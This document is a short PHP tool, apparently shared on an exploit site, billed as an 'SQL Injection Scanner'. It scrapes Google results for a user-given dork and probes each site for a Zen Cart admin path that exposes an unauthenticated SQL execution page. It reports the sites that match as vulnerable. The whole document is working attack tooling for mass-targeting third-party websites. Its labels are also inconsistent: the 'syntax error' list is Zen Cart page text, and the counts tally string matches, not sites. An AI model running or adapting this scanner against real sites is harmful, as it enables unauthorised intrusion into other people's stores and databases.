SQL Injection Scanner By XShimeX

1. <?php
2.     /**
3.      * SQL Injection Scanner
4.      * PHP Version By XShimeX
5.      * Version 1.0
6.      * Thanks To: TBDSecurity.Com, <b style="color:black;background-color:#ffff66">HMSecurity</b>.org, All my friends, And ALLAH.
7.     */
8.     set_time_limit(0);
9.    
10.     $vuln = 0;
11.     $not_vuln = 0;
12.     $total = 0;
13.    
14.     print "[+] SQL Injection Scanner PHP Version\n";
15.     print "[+] Version 1.0 By XShimeX\n";
16.    
17.     if(!$argv[1]) {
18.         print "[%] Usage: $argv[0] <dork>\n";
19.         print "[%] Example : $argv[0] inurl:news.php?id=\n";
20.         exit;
21.     }
22.    
23.     /**
24.     * SQL Bug(syntax error) takes from here: http://www.darkc0de.com/others/devilzc0de.py
25.     */
26.    
27.     $bug = array(
28.     'If you are installing 3rd-party contributions, note that you do so at your own risk',
29.     'BE SURE TO DO A FULL DATABASE BACKUP BEFORE RUNNING SCRIPTS HERE',
30.     'Zen Cart™ makes no warranty as to the safety of scripts supplied by 3rd-party contributors. Test before using on your live database',
31.     'NOTE: Zen Cart database-upgrade scripts should NOT be run from this page',
32.     'Please upload the new zc_install folder and run the upgrade from there instead for better reliability'
33.     );
34.    
35.     print "[@] Start Finding Links...\n";
36.     for($i = 0; $i <= 900; $i += 10) {
37.         $fp = @file_get_contents("http://www.google.com/search?q=$argv[1]&num=10&hl=en&as_qdr=all&start=$i&sa=N");
38.         @preg_match_all("/<h3 class=(.*?)><a href=\"(.*?)\" class=(.*?)>/", $fp, $links);
39.         $url[] = $links[2];
40.     }
41.     print "[@] Done Finding Links...\n";
42.     print "[@] Now searching for Vulnerable\n";
43.     foreach($url as $key) {
44.         foreach($key as $value) {
45.             $fp = @file_get_contents($value."/admin/sqlpatch.php/password_forgotten.php?action=execute");
46.             foreach($bug as $error) {
47.                 if(@preg_match("/$error/", $fp)) {
48.                     print "[#] zen cart error: $value'\n";
49.                     $vuln++;
50.                 } else {
51.                     $not_vuln++;
52.                 }
53.             $total++;
54.             }
55.         }
56.     }
57.     print "[@] Done Scanning\n";
58.     print "[%] Result\n";
59.     print "[-] Total Vulnerable: $vuln\n";
60.     print "[-] Total Not Vulnerable : $not_vuln\n";
61.     print "[-] Total scanned Website: $total\n";
62.     print "Enjoy :)\n";
63.    
64. ?>